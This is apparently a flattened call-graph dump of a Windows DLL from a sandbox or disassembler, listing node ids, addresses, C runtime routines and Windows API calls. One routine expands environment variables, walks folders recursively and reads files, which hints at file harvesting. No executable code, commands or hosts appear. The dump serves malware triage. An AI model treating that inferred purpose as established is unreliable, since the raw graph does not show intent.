1000571e _free 19 API calls 7798 10004fe9 7797->7798 7798->7779 7799 1000637b _abort 19 API calls 7799->7805 7800 10004fd1 7802 10005000 19 API calls 7800->7802 7801 1000544d ___std_exception_copy 25 API calls 7801->7805 7803 10004fd7 7802->7803 7804 1000571e _free 19 API calls 7803->7804 7807 10004fcf 7804->7807 7805->7799 7805->7800 7805->7801 7806 10004ff3 7805->7806 7805->7807 7809 1000571e _free 19 API calls 7805->7809 7808 100062bc _abort 11 API calls 7806->7808 7807->7797 7810 10004fff 7808->7810 7809->7805 6980 10002418 6981 10002420 ___scrt_release_startup_lock 6980->6981 6984 100047f5 6981->6984 6983 10002448 6985 10004804 6984->6985 6986 10004808 6984->6986 6985->6983 6989 10004815 6986->6989 6990 10005b7a _abort 19 API calls 6989->6990 6993 1000482c 6990->6993 6991 10002ada _ValidateLocalCookies 5 API calls 6992 10004811 6991->6992 6992->6983 6993->6991 7642 10004a9a 7645 10005411 7642->7645 7646 1000541d _abort 7645->7646 7647 10005af6 _abort 36 API calls 7646->7647 7650 10005422 7647->7650 7648 100055a8 _abort 36 API calls 7649 1000544c 7648->7649 7650->7648 6511 10001c5b 6512 10001c6b ___scrt_fastfail 6511->6512 6515 100012ee 6512->6515 6514 10001c87 6516 10001324 ___scrt_fastfail 6515->6516 6517 100013b7 GetEnvironmentVariableW 6516->6517 6541 100010f1 6517->6541 6520 100010f1 51 API calls 6521 10001465 6520->6521 6522 100010f1 51 API calls 6521->6522 6523 10001479 6522->6523 6524 100010f1 51 API calls 6523->6524 6525 1000148d 6524->6525 6526 100010f1 51 API calls 6525->6526 6527 100014a1 6526->6527 6528 100010f1 51 API calls 6527->6528 6529 100014b5 lstrlenW 6528->6529 6530 100014d2 6529->6530 6531 100014d9 lstrlenW 6529->6531 6530->6514 6532 100010f1 51 API calls 6531->6532 6533 10001501 lstrlenW lstrcatW 6532->6533 6534 100010f1 51 API calls 6533->6534 6535 10001539 lstrlenW lstrcatW 6534->6535 6536 100010f1 51 API calls 6535->6536 6537 1000156b lstrlenW lstrcatW 6536->6537 6538 100010f1 51 API calls 6537->6538 6539 1000159d lstrlenW lstrcatW 6538->6539 6540 100010f1 51 API calls 6539->6540 6540->6530 6542 10001118 ___scrt_fastfail 6541->6542 6543 10001129 lstrlenW 6542->6543 6554 10002c40 6543->6554 6545 10001148 lstrcatW lstrlenW 6546 10001177 lstrlenW FindFirstFileW 6545->6546 6547 10001168 lstrlenW 6545->6547 6548 100011a0 6546->6548 6549 100011e1 6546->6549 6547->6546 6550 100011c7 FindNextFileW 6548->6550 6551 100011aa 6548->6551 6549->6520 6550->6548 6553 100011da FindClose 6550->6553 6551->6550 6556 10001000 6551->6556 6553->6549 6555 10002c57 6554->6555 6555->6545 6555->6555 6557 10001022 ___scrt_fastfail 6556->6557 6558 100010af 6557->6558 6559 1000102f lstrcatW lstrlenW 6557->6559 6562 100010b5 lstrlenW 6558->6562 6572 100010ad 6558->6572 6560 1000105a lstrlenW 6559->6560 6561 1000106b lstrlenW 6559->6561 6560->6561 6573 10001e89 lstrlenW 6561->6573 6587 10001e16 6562->6587 6565 10001088 GetFileAttributesW 6568 1000109c 6565->6568 6565->6572 6566 100010ca 6567 10001e89 5 API calls 6566->6567 6566->6572 6569 100010df 6567->6569 6568->6572 6579 1000173a 6568->6579 6592 100011ea 6569->6592 6572->6551 6574 10002c40 ___scrt_fastfail 6573->6574 6575 10001ea7 lstrcatW lstrlenW 6574->6575 6576 10001ed1 lstrcatW 6575->6576 6577 10001ec2 6575->6577 6576->6565 6577->6576 6578 10001ec7 lstrlenW 6577->6578 6578->6576 6580 10001747 ___scrt_fastfail 6579->6580 6607 10001cca 6580->6607 6583 1000199f 6583->6572 6585 10001824 ___scrt_fastfail _strlen 6585->6583 6625 100015da 6585->6625 6588 10001e29 6587->6588 6589 10001e4c 6587->6589 6588->6589 6590 10001e2d lstrlenW 6588->6590 6589->6566 6590->6589 6591 10001e3f lstrlenW 6590->6591 6591->6589 6593 1000120e ___scrt_fastfail 6592->6593 6594 10001e89 5 API calls 6593->6594 6595 10001220 GetFileAttributesW 6594->6595 6596 10001235 6595->6596 6597 10001246 6595->6597 6596->6597 6599 1000173a 29 API calls 6596->6599 6598 10001e89 5 API calls 6597->6598 6600 10001258 6598->6600 6599->6597 6601 100010f1 50 API calls 6600->6601 6602 1000126d 6601->6602 6603 10001e89 5 API calls 6602->6603 6604 1000127f ___scrt_fastfail 6603->6604 6605 100010f1 50 API calls 6604->6605 6606 100012e6 6605->6606 6606->6572 6608 10001cf1 ___scrt_fastfail 6607->6608 6609 10001d55 GetFileSize 6608->6609 6614 10001808 6608->6614 6610 10001ede 21 API calls 6609->6610 6611 10001d66 ReadFile 6610->6611 6612 10001d94 CloseHandle 6611->6612 6613 10001d7d CloseHandle 6611->6613 6612->6614 6613->6614 6614->6583 6615 10001ede 6614->6615 6617 1000222f 6615->6617 6618 1000224e 6617->6618 6619 1000474f _abort 7 API calls 6617->6619 6620 10002250 6617->6620 6633 100047e5 6617->6633 6618->6585 6619->6617 6621 10002908 6620->6621 6640 100035d2 6620->6640 6622 100035d2 __CxxThrowException@8 RaiseException 6621->6622 6623 10002925 6622->6623 6623->6585 6626 1000160c _strcat _strlen 6625->6626 6627 1000163c lstrlenW 6626->6627 6643 10001c9d 6627->6643 6629 10001655 lstrcatW lstrlenW 6630 10001678 6629->6630 6631 10001693 ___scrt_fastfail 6630->6631 6632 1000167e lstrcatW 6630->6632 6631->6585 6632->6631 6638 100056d0 _abort 6633->6638 6634 1000570e 6635 10006368 __dosmaperr 19 API calls 6634->6635 6637 1000570c 6635->6637 6636 100056f9 RtlAllocateHeap 6636->6637 6636->6638 6637->6617 6638->6634 6638->6636 6639 1000474f _abort 7 API calls 6638->6639 6639->6638 6642 100035f2 RaiseException 6640->6642 6642->6621 6644 10001ca6 _strlen 6643->6644 6644->6629 6645 100020db 6646 100020e7 ___scrt_is_nonwritable_in_current_image 6645->6646 6647 10002110 dllmain_raw 6646->6647 6651 1000210b 6646->6651 6656 100020f6 6646->6656 6648 1000212a 6647->6648 6647->6656 6658 10001eec 6648->6658 6650 10002177 6652 10001eec 29 API calls 6650->6652 6650->6656 6651->6650 6654 10001eec 29 API calls 6651->6654 6651->6656 6653 1000218a 6652->6653 6655 10002193 dllmain_raw 6653->6655 6653->6656 6657 1000216d dllmain_raw 6654->6657 6655->6656 6657->6650 6659 10001ef7 6658->6659 6660 10001f2a dllmain_crt_process_detach 6658->6660 6661 10001f1c dllmain_crt_process_attach 6659->6661 6662 10001efc 6659->6662 6663 10001f06 6660->6663 6661->6663 6664 10001f01 6662->6664 6665 10001f12 6662->6665 6663->6651 6664->6663 6668 1000240b 6664->6668 6673 100023ec 6665->6673 6681 100053e5 6668->6681 6786 10003513 6673->6786 6676 100023f5 6676->6663 6679 10002408 6679->6663 6680 1000351e 6 API calls 6680->6676 6687 10005aca 6681->6687 6684 1000351e 6759 10003820 6684->6759 6686 10002415 6686->6663 6688 10005ad4 6687->6688 6691 10002410 6687->6691 6689 10005e08 _abort 10 API calls 6688->6689 6690 10005adb 6689->6690 6690->6691 6692 10005e5e _abort 10 API calls 6690->6692 6691->6684 6693 10005aee 6692->6693 6695 100059b5 6693->6695 6696 100059c0 6695->6696 6697 100059d0 6695->6697 6701 100059d6 6696->6701 6697->6691 6700 1000571e _free 19 API calls 6700->6697 6702 100059ef 6701->6702 6703 100059e9 6701->6703 6705 1000571e _free 19 API calls 6702->6705 6704 1000571e _free 19 API calls 6703->6704 6704->6702 6706 100059fb 6705->6706 6707 1000571e _free 19 API calls 6706->6707 6708 10005a06 6707->6708 6709 1000571e _free 19 API calls 6708->6709 6710 10005a11 6709->6710 6711 1000571e _free 19 API calls 6710->6711 6712 10005a1c 6711->6712 6713 1000571e _free 19 API calls 6712->6713 6714 10005a27 6713->6714 6715 1000571e _free 19 API calls 6714->6715 6716 10005a32 6715->6716 6717 1000571e _free 19 API calls 6716->6717 6718 10005a3d 6717->6718 6719 1000571e _free 19 API calls 6718->6719 6720 10005a48 6719->6720 6721 1000571e _free 19 API calls 6720->6721 6722 10005a56 6721->6722 6727 1000589c 6722->6727 6733 100057a8 6727->6733 6729 100058c0 6730 100058ec 6729->6730 6746 10005809 6730->6746 6732 10005910 6732->6700 6734 100057b4 ___scrt_is_nonwritable_in_current_image 6733->6734 6741 10005671 RtlEnterCriticalSection 6734->6741 6736 100057e8 6742 100057fd 6736->6742 6738 100057be 6738->6736 6739 1000571e _free 19 API calls 6738->6739 6739->6736 6740 100057f5 _abort 6740->6729 6741->6738 6745 100056b9 RtlLeaveCriticalSection 6742->6745 6744 10005807 6744->6740 6745->6744 6747 10005815 ___scrt_is_nonwritable_in_current_image 6746->6747 6754 10005671 RtlEnterCriticalSection 6747->6754 6749 1000581f 6750 10005a7f _abort 19 API calls 6749->6750 6751 10005832 6750->6751 6755 10005848 6751->6755 6753 10005840 _abort 6753->6732 6754->6749 6758 100056b9 RtlLeaveCriticalSection 6755->6758 6757 10005852 6757->6753 6758->6757 6760 1000382d 6759->6760 6764 1000384b ___vcrt_freefls@4 6759->6764 6761 1000383b 6760->6761 6765 10003b67 6760->6765 6770 10003ba2 6761->6770 6764->6686 6775 10003a82 6765->6775 6767 10003b81 6768 10003b99 TlsGetValue 6767->6768 6769 10003b8d 6767->6769 6768->6769 6769->6761 6771 10003a82 try_get_function 4 API calls 6770->6771 6772 10003bbc 6771->6772 6773 10003bd7 TlsSetValue 6772->6773 6774 10003bcb 6772->6774 6773->6774 6774->6764 6776 10003aaa 6775->6776 6778 10003aa6 __crt_fast_encode_pointer 6775->6778 6776->6778 6779 100039be 6776->6779 6778->6767 6784 100039cd try_get_first_available_module 6779->6784 6780 10003a77 6780->6778 6781 100039ea LoadLibraryExW 6782 10003a05 GetLastError 6781->6782 6781->6784 6782->6784 6783 10003a60 FreeLibrary 6783->6784 6784->6780 6784->6781 6784->6783 6785 10003a38 LoadLibraryExW 6784->6785 6785->6784 6792 10003856 6786->6792 6788 100023f1 6788->6676 6789 100053da 6788->6789 6790 10005b7a _abort 19 API calls 6789->6790 6791 100023fd 6790->6791 6791->6679 6791->6680 6793 10003862 GetLastError 6792->6793 6794 1000385f 6792->6794 6795 10003b67 ___vcrt_FlsGetValue 5 API calls 6793->6795 6794->6788 6796 10003877 6795->6796 6797 100038dc SetLastError 6796->6797 6798 10003ba2 ___vcrt_FlsSetValue 5 API calls 6796->6798 6803 10003896 6796->6803 6797->6788 6799 10003890 6798->6799 6800 100038b8 6799->6800 6801 10003ba2 ___vcrt_FlsSetValue 5 API calls 6799->6801 6799->6803 6802 10003ba2 ___vcrt_FlsSetValue 5 API calls 6800->6802 6800->6803 6801->6800 6802->6803 6803->6797 6994 1000281c 6997 10002882 6994->6997 7000 10003550 6997->7000 6999 1000282a 7001 1000355d 7000->7001 7004 1000358a 7000->7004 7002 100047e5 ___std_exception_copy 20 API calls 7001->7002 7001->7004 7003 1000357a 7002->7003 7003->7004 7006 1000544d 7003->7006 7004->6999 7007 1000545a 7006->7007 7008 10005468 7006->7008 7007->7008 7013 1000547f 7007->7013 7009 10006368 __dosmaperr 19 API calls 7008->7009 7010 10005470 7009->7010 7011 100062ac _abort 25 API calls 7010->7011 7012 1000547a 7011->7012 7012->7004 7013->7012 7014 10006368 __dosmaperr 19 API calls 7013->7014 7014->7010 7811 10004bdd 7812 10004c08 7811->7812 7813 10004bec 7811->7813 7814 10006d60 49 API calls 7812->7814 7813->7812 7815 10004bf2 7813->7815 7816 10004c0f GetModuleFileNameA 7814->7816 7817 10006368 __dosmaperr 19 API calls 7815->7817 7818 10004c33 7816->7818 7819 10004bf7 7817->7819 7834 10004d01 7818->7834 7820 100062ac _abort 25 API calls 7819->7820 7822 10004c01 7820->7822 7826 10004c72 7829 10004d01 36 API calls 7826->7829 7827 10004c66 7828 10006368 __dosmaperr 19 API calls 7827->7828 7830 10004c6b 7828->7830 7831 10004c88 7829->7831 7832 1000571e _free 19 API calls 7830->7832 7831->7830 7833 1000571e _free 19 API calls 7831->7833 7832->7822 7833->7830 7836 10004d26 7834->7836 7838 10004d86 7836->7838 7846 100070eb 7836->7846 7837 10004c50 7840 10004e76 7837->7840 7838->7837 7839 100070eb 36 API calls 7838->7839 7839->7838 7841 10004e8b 7840->7841 7842 10004c5d 7840->7842 7841->7842 7843 1000637b _abort 19 API calls 7841->7843 7842->7826 7842->7827 7844 10004eb9 7843->7844 7845 1000571e _free 19 API calls 7844->7845 7845->7842 7849 10007092 7846->7849 7850 100054a7 __fassign 36 API calls 7849->7850 7851 100070a6 7850->7851 7851->7836 5842 10006d60 5843 10006d69 5842->5843 5844 10006d72 5842->5844 5846 10006c5f 5843->5846 5866 10005af6 GetLastError 5846->5866 5848 10006c6c 5886 10006d7e 5848->5886 5850 10006c74 5895 100069f3 5850->5895 5853 10006c8b 5853->5844 5856 10006cce 5922 1000571e 5856->5922 5860 10006cc9 5919 10006368 5860->5919 5862 10006d12 5862->5856 5928 100068c9 5862->5928 5863 10006ce6 5863->5862 5864 1000571e _free 19 API calls 5863->5864 5864->5862 5867 10005b12 5866->5867 5868 10005b0c 5866->5868 5872 10005b61 SetLastError 5867->5872 5938 1000637b 5867->5938 5931 10005e08 5868->5931 5872->5848 5873 10005b2c 5875 1000571e _free 19 API calls 5873->5875 5877 10005b32 5875->5877 5880 10005b6d SetLastError 5877->5880 5878 10005b48 5952 1000593c 5878->5952 5957 100055a8 5880->5957 5883 1000571e _free 19 API calls 5885 10005b5a 5883->5885 5885->5872 5885->5880 5887 10006d8a ___scrt_is_nonwritable_in_current_image 5886->5887 5888 10005af6 _abort 36 API calls 5887->5888 5890 10006d94 5888->5890 5891 10006e18 _abort 5890->5891 5892 100055a8 _abort 36 API calls 5890->5892 5894 1000571e _free 19 API calls 5890->5894 6332 10005671 RtlEnterCriticalSection 5890->6332 6333 10006e0f 5890->6333 5891->5850 5892->5890 5894->5890 6337 100054a7 5895->6337 5898 10006a14 GetOEMCP 5900 10006a3d 5898->5900 5899 10006a26 5899->5900 5901 10006a2b GetACP 5899->5901 5900->5853 5902 100056d0 5900->5902 5901->5900 5903 1000570e 5902->5903 5907 100056de _abort 5902->5907 5904 10006368 __dosmaperr 19 API calls 5903->5904 5906 1000570c 5904->5906 5905 100056f9 RtlAllocateHeap 5905->5906 5905->5907 5906->5856 5909 10006e20 5906->5909 5907->5903 5907->5905 5908 1000474f _abort 7 API calls 5907->5908 5908->5907 5910 100069f3 38 API calls 5909->5910 5911 10006e3f 5910->5911 5914 10006e90 IsValidCodePage 5911->5914 5916 10006e46 5911->5916 5918 10006eb5 ___scrt_fastfail 5911->5918 5912 10002ada _ValidateLocalCookies 5 API calls 5913 10006cc1 5912->5913 5913->5860 5913->5863 5915 10006ea2 GetCPInfo 5914->5915 5914->5916 5915->5916 5915->5918 5916->5912 6374 10006acb GetCPInfo 5918->6374 5920 10005b7a _abort 19 API calls 5919->5920 5921 1000636d 5920->5921 5921->5856 5923 10005752 __dosmaperr 5922->5923 5924 10005729 HeapFree 5922->5924 5923->5853 5924->5923 5925 1000573e 5924->5925 5926 10006368 __dosmaperr 17 API calls 5925->5926 5927 10005744 GetLastError 5926->5927 5927->5923 6447 10006886 5928->6447 5930 100068ed 5930->5856 5968 10005c45 5931->5968 5933 10005e2f 5934 10005e47 TlsGetValue 5933->5934 5937 10005e3b 5933->5937 5934->5937 5936 10005e58 5936->5867 5972 10002ada 5937->5972 5944 10006388 _abort 5938->5944 5939 100063c8 5941 10006368 __dosmaperr 18 API calls 5939->5941 5940 100063b3 RtlAllocateHeap 5942 10005b24 5940->5942 5940->5944 5941->5942 5942->5873 5945 10005e5e 5942->5945 5944->5939 5944->5940 5987 1000474f 5944->5987 5946 10005c45 _abort 4 API calls 5945->5946 5947 10005e85 5946->5947 5948 10005ea0 TlsSetValue 5947->5948 5951 10005e94 5947->5951 5948->5951 5949 10002ada _ValidateLocalCookies 5 API calls 5950 10005b41 5949->5950 5950->5873 5950->5878 5951->5949 6003 10005914 5952->6003 6151 10007613 5957->6151 5960 100055b8 5962 100055c2 IsProcessorFeaturePresent 5960->5962 5963 100055e0 5960->5963 5965 100055cd 5962->5965 6187 10004bc1 5963->6187 6181 100060e2 5965->6181 5970 10005c71 5968->5970 5971 10005c75 __crt_fast_encode_pointer 5968->5971 5970->5971 5979 10005ce1 5970->5979 5971->5933 5973 10002ae3 5972->5973 5974 10002ae5 IsProcessorFeaturePresent 5972->5974 5973->5936 5976 10002b58 5974->5976 5986 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5976->5986 5978 10002c3b 5978->5936 5980 10005d02 LoadLibraryExW 5979->5980 5985 10005cf7 5979->5985 5981 10005d1f GetLastError 5980->5981 5984 10005d37 5980->5984 5982 10005d2a LoadLibraryExW 5981->5982 5981->5984 5982->5984 5983 10005d4e FreeLibrary 5983->5985 5984->5983 5984->5985 5985->5970 5986->5978 5992 10004793 5987->5992 5989 10002ada _ValidateLocalCookies 5 API calls 5990 1000478f 5989->5990 5990->5944 5991 10004765 5991->5989 5993 1000479f ___scrt_is_nonwritable_in_current_image 5992->5993 5998 10005671 RtlEnterCriticalSection 5993->5998 5995 100047aa 5999 100047dc 5995->5999 5997 100047d1 _abort 5997->5991 5998->5995 6002 100056b9 RtlLeaveCriticalSection 5999->6002 6001 100047e3 6001->5997 6002->6001 6009 10005854 6003->6009 6005 10005938 6006 100058c4 6005->6006 6020 10005758 6006->6020 6008 100058e8 6008->5883 6010 10005860 ___scrt_is_nonwritable_in_current_image 6009->6010 6015 10005671 RtlEnterCriticalSection 6010->6015 6012 1000586a 6016 10005890 6012->6016 6014 10005888 _abort 6014->6005 6015->6012 6019 100056b9 RtlLeaveCriticalSection 6016->6019 6018 1000589a 6018->6014 6019->6018 6021 10005764 ___scrt_is_nonwritable_in_current_image 6020->6021 6028 10005671 RtlEnterCriticalSection 6021->6028 6023 1000576e 6029 10005a7f 6023->6029 6025 10005786 6033 1000579c 6025->6033 6027 10005794 _abort 6027->6008 6028->6023 6030 10005ab5 __fassign 6029->6030 6031 10005a8e __fassign 6029->6031 6030->6025 6031->6030 6036 10007cc2 6031->6036 6150 100056b9 RtlLeaveCriticalSection 6033->6150 6035 100057a6 6035->6027 6037 10007d42 6036->6037 6041 10007cd8 6036->6041 6038 10007d90 6037->6038 6040 1000571e _free 19 API calls 6037->6040 6104 10007e35 6038->6104 6042 10007d64 6040->6042 6041->6037 6043 10007d0b 6041->6043 6048 1000571e _free 19 API calls 6041->6048 6044 1000571e _free 19 API calls 6042->6044 6045 10007d2d 6043->6045 6050 1000571e _free 19 API calls 6043->6050 6046 10007d77 6044->6046 6047 1000571e _free 19 API calls 6045->6047 6049 1000571e _free 19 API calls 6046->6049 6051 10007d37 6047->6051 6053 10007d00 6048->6053 6056 10007d85 6049->6056 6057 10007d22 6050->6057 6058 1000571e _free 19 API calls 6051->6058 6052 10007dfe 6059 1000571e _free 19 API calls 6052->6059 6064 100090ba 6053->6064 6054 10007d9e 6054->6052 6062 1000571e 19 API calls _free 6054->6062 6060 1000571e _free 19 API calls 6056->6060 6092 100091b8 6057->6092 6058->6037 6063 10007e04 6059->6063 6060->6038 6062->6054 6063->6030 6065 100090cb 6064->6065 6091 100091b4 6064->6091 6066 100090dc 6065->6066 6068 1000571e _free 19 API calls 6065->6068 6067 100090ee 6066->6067 6069 1000571e _free 19 API calls 6066->6069 6070 10009100 6067->6070 6071 1000571e _free 19 API calls 6067->6071 6068->6066 6069->6067 6072 10009112 6070->6072 6073 1000571e _free 19 API calls 6070->6073 6071->6070 6074 10009124 6072->6074 6076 1000571e _free 19 API calls 6072->6076 6073->6072 6075 10009136 6074->6075 6077 1000571e _free 19 API calls 6074->6077 6078 10009148 6075->6078 6079 1000571e _free 19 API calls 6075->6079 6076->6074 6077->6075 6080 1000571e _free 19 API calls 6078->6080 6083 1000915a 6078->6083 6079->6078 6080->6083 6081 1000916c 6082 1000917e 6081->6082 6085 1000571e _free 19 API calls 6081->6085 6086 10009190 6082->6086 6087 1000571e _free 19 API calls 6082->6087 6083->6081 6084 1000571e _free 19 API calls 6083->6084 6084->6081 6085->6082 6088 100091a2 6086->6088 6089 1000571e _free 19 API calls 6086->6089 6087->6086 6090 1000571e _free 19 API calls 6088->6090 6088->6091 6089->6088 6090->6091 6091->6043 6093 100091c5 6092->6093 6094 1000921d 6092->6094 6095 100091d5 6093->6095 6096 1000571e _free 19 API calls 6093->6096 6094->6045 6097 100091e7 6095->6097 6098 1000571e _free 19 API calls 6095->6098 6096->6095 6099 100091f9 6097->6099 6100 1000571e _free 19 API calls 6097->6100 6098->6097 6101 1000920b 6099->6101 6102 1000571e _free 19 API calls 6099->6102 6100->6099 6101->6094 6103 1000571e _free 19 API calls 6101->6103 6102->6101 6103->6094 6105 10007e42 6104->6105 6109 10007e60 6104->6109 6105->6109 6110 1000925d 6105->6110 6108 1000571e _free 19 API calls 6108->6109 6109->6054 6111 10007e5a 6110->6111 6112 1000926e 6110->6112 6111->6108 6146 10009221 6112->6146 6115 10009221 __fassign 19 API calls 6116 10009281 6115->6116 6117 10009221 __fassign 19 API calls 6116->6117 6118 1000928c 6117->6118 6119 10009221 __fassign 19 API calls 6118->6119 6120 10009297 6119->6120 6121 10009221 __fassign 19 API calls 6120->6121 6122 100092a5 6121->6122 6123 1000571e _free 19 API calls 6122->6123 6124 100092b0 6123->6124 6125 1000571e _free 19 API calls 6124->6125 6126 100092bb 6125->6126 6127 1000571e _free 19 API calls 6126->6127 6128 100092c6 6127->6128 6129 10009221 __fassign 19 API calls 6128->6129 6130 100092d4 6129->6130 6131 10009221 __fassign 19 API calls 6130->6131 6132 100092e2 6131->6132 6133 10009221 __fassign 19 API calls 6132->6133 6134 100092f3 6133->6134 6135 10009221 __fassign 19 API calls 6134->6135 6136 10009301 6135->6136 6137 10009221 __fassign 19 API calls 6136->6137 6138 1000930f 6137->6138 6139 1000571e _free 19 API calls 6138->6139 6140 1000931a 6139->6140 6141 1000571e _free 19 API calls 6140->6141 6142 10009325 6141->6142 6143 1000571e _free 19 API calls 6142->6143 6144 10009330 6143->6144 6145 1000571e _free 19 API calls 6144->6145 6145->6111 6147 10009258 6146->6147 6148 10009248 6146->6148 6147->6115 6148->6147 6149 1000571e _free 19 API calls 6148->6149 6149->6148 6150->6035 6190 10007581 6151->6190 6154 1000766e 6155 1000767a _abort 6154->6155 6160 100076a7 _abort 6155->6160 6161 100076a1 _abort 6155->6161 6204 10005b7a GetLastError 6155->6204 6157 100076f3 6158 10006368 __dosmaperr 19 API calls 6157->6158 6159 100076f8 6158->6159 6223 100062ac 6159->6223 6166 1000771f 6160->6166 6226 10005671 RtlEnterCriticalSection 6160->6226 6161->6157 6161->6160 6180 100076d6 6161->6180 6167 1000777e 6166->6167 6169 10007776 6166->6169 6177 100077a9 6166->6177 6227 100056b9 RtlLeaveCriticalSection 6166->6227 6167->6177 6228 10007665 6167->6228 6172 10004bc1 _abort 26 API calls 6169->6172 6172->6167 6174 10005af6 _abort 36 API calls 6178 1000780c 6174->6178 6176 10007665 _abort 36 API calls 6176->6177 6231 1000782e 6177->6231 6179 10005af6 _abort 36 API calls 6178->6179 6178->6180 6179->6180 6235 1000bdc9 6180->6235 6182 100060fe ___scrt_fastfail 6181->6182 6183 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6182->6183 6185 100061fb ___scrt_fastfail 6183->6185 6184 10002ada _ValidateLocalCookies 5 API calls 6186 10006219 6184->6186 6185->6184 6186->5963 6254 1000499b 6187->6254 6193 10007527 6190->6193 6192 100055ad 6192->5960 6192->6154 6194 10007533 ___scrt_is_nonwritable_in_current_image 6193->6194 6199 10005671 RtlEnterCriticalSection 6194->6199 6196 10007541 6200 10007575 6196->6200 6198 10007568 _abort 6198->6192 6199->6196 6203 100056b9 RtlLeaveCriticalSection 6200->6203 6202 1000757f 6202->6198 6203->6202 6205 10005b93 6204->6205 6206 10005b99 6204->6206 6207 10005e08 _abort 10 API calls 6205->6207 6208 1000637b _abort 16 API calls 6206->6208 6210 10005bf0 SetLastError 6206->6210 6207->6206 6209 10005bab 6208->6209 6211 10005bb3 6209->6211 6213 10005e5e _abort 10 API calls 6209->6213 6212 10005bf9 6210->6212 6214 1000571e _free 16 API calls 6211->6214 6212->6161 6215 10005bc8 6213->6215 6216 10005bb9 6214->6216 6215->6211 6217 10005bcf 6215->6217 6218 10005be7 SetLastError 6216->6218 6219 1000593c _abort 16 API calls 6217->6219 6218->6212 6220 10005bda 6219->6220 6221 1000571e _free 16 API calls 6220->6221 6222 10005be0 6221->6222 6222->6210 6222->6218 6238 10006231 6223->6238 6225 100062b8 6225->6180 6226->6166 6227->6169 6229 10005af6 _abort 36 API calls 6228->6229 6230 1000766a 6229->6230 6230->6176 6232 10007834 6231->6232 6233 100077fd 6231->6233 6253 100056b9 RtlLeaveCriticalSection 6232->6253 6233->6174 6233->6178 6233->6180 6236 10002ada _ValidateLocalCookies 5 API calls 6235->6236 6237 1000bdd4 6236->6237 6237->6237 6239 10005b7a _abort 19 API calls 6238->6239 6240 10006247 6239->6240 6241 100062a6 6240->6241 6244 10006255 6240->6244 6249 100062bc IsProcessorFeaturePresent 6241->6249 6243 100062ab 6245 10006231 _abort 25 API calls 6243->6245 6246 10002ada _ValidateLocalCookies 5 API calls 6244->6246 6247 100062b8 6245->6247 6248 1000627c 6246->6248 6247->6225 6248->6225 6250 100062c7 6249->6250 6251 100060e2 _abort 8 API calls 6250->6251 6252 100062dc GetCurrentProcess TerminateProcess 6251->6252 6252->6243 6253->6233 6255 100049a7 _abort 6254->6255 6256 100049bf 6255->6256 6276 10004af5 GetModuleHandleW 6255->6276 6284 10005671 RtlEnterCriticalSection 6256->6284 6260 10004a65 6292 10004aa5 6260->6292 6264 10004a3c 6265 10004a54 6264->6265 6288 10004669 6264->6288 6272 10004669 _abort 5 API calls 6265->6272 6266 100049c7 6266->6260 6266->6264 6285 1000527a 6266->6285 6267 10004a82 6295 10004ab4 6267->6295 6268 10004aae 6270 1000bdc9 _abort 5 API calls 6268->6270 6274 10004ab3 6270->6274 6272->6260 6277 100049b3 6276->6277 6277->6256 6278 10004b39 GetModuleHandleExW 6277->6278 6283 10004b63 6278->6283 6279 10004b95 6281 10002ada _ValidateLocalCookies 5 API calls 6279->6281 6280 10004b8c FreeLibrary 6280->6279 6282 10004b9f 6281->6282 6282->6256 6283->6279 6283->6280 6284->6266 6303 10005132 6285->6303 6289 10004698 6288->6289 6290 10002ada _ValidateLocalCookies 5 API calls 6289->6290 6291 100046c1 6290->6291 6291->6265 6325 100056b9 RtlLeaveCriticalSection 6292->6325 6294 10004a7e 6294->6267 6294->6268 6326 10006025 6295->6326 6298 10004ae2 6301 10004b39 _abort 7 API calls 6298->6301 6299 10004ac2 GetPEB 6299->6298 6300 10004ad2 GetCurrentProcess TerminateProcess 6299->6300 6300->6298 6302 10004aea ExitProcess 6301->6302 6306 100050e1 6303->6306 6305 10005156 6305->6264 6307 100050ed ___scrt_is_nonwritable_in_current_image 6306->6307 6314 10005671 RtlEnterCriticalSection 6307->6314 6309 100050fb 6315 1000515a 6309->6315 6313 10005119 _abort 6313->6305 6314->6309 6318 10005182 6315->6318 6319 1000517a 6315->6319 6316 10002ada _ValidateLocalCookies 5 API calls 6317 10005108 6316->6317 6321 10005126 6317->6321 6318->6319 6320 1000571e _free 19 API calls 6318->6320 6319->6316 6320->6319 6324 100056b9 RtlLeaveCriticalSection 6321->6324 6323 10005130 6323->6313 6324->6323 6325->6294 6327 1000604a 6326->6327 6331 10006040 6326->6331 6328 10005c45 _abort 4 API calls 6327->6328 6328->6331 6329 10002ada _ValidateLocalCookies 5 API calls 6330 10004abe 6329->6330 6330->6298 6330->6299 6331->6329 6332->5890 6336 100056b9 RtlLeaveCriticalSection 6333->6336 6335 10006e16 6335->5890 6336->6335 6338 100054c4 6337->6338 6344 100054ba 6337->6344 6339 10005af6 _abort 36 API calls 6338->6339 6338->6344 6340 100054e5 6339->6340 6345 10007a00 6340->6345 6344->5898 6344->5899 6346 10007a13 6345->6346 6348 100054fe 6345->6348 6346->6348 6353 10007f0f 6346->6353 6349 10007a2d 6348->6349 6350 10007a40 6349->6350 6352 10007a55 6349->6352 6351 10006d7e __fassign 36 API calls 6350->6351 6350->6352 6351->6352 6352->6344 6354 10007f1b ___scrt_is_nonwritable_in_current_image 6353->6354 6355 10005af6 _abort 36 API calls 6354->6355 6356 10007f24 6355->6356 6359 10007f72 _abort 6356->6359 6365 10005671 RtlEnterCriticalSection 6356->6365 6358 10007f42 6366 10007f86 6358->6366 6359->6348 6364 100055a8 _abort 36 API calls 6364->6359 6365->6358 6367 10007f94 __fassign 6366->6367 6369 10007f56 6366->6369 6368 10007cc2 __fassign 19 API calls 6367->6368 6367->6369 6368->6369 6370 10007f75 6369->6370 6373 100056b9 RtlLeaveCriticalSection 6370->6373 6372 10007f69 6372->6359 6372->6364 6373->6372 6380 10006b05 6374->6380 6383 10006baf 6374->6383 6376 10002ada _ValidateLocalCookies 5 API calls 6379 10006c5b 6376->6379 6379->5916 6384 100086e4 6380->6384 6382 10008a3e 41 API calls 6382->6383 6383->6376 6385 100054a7 __fassign 36 API calls 6384->6385 6386 10008704 MultiByteToWideChar 6385->6386 6388 10008742 6386->6388 6396 100087da 6386->6396 6390 100056d0 20 API calls 6388->6390 6393 10008763 ___scrt_fastfail 6388->6393 6389 10002ada _ValidateLocalCookies 5 API calls 6391 10006b66 6389->6391 6390->6393 6398 10008a3e 6391->6398 6392 100087d4 6403 10008801 6392->6403 6393->6392 6395 100087a8 MultiByteToWideChar 6393->6395 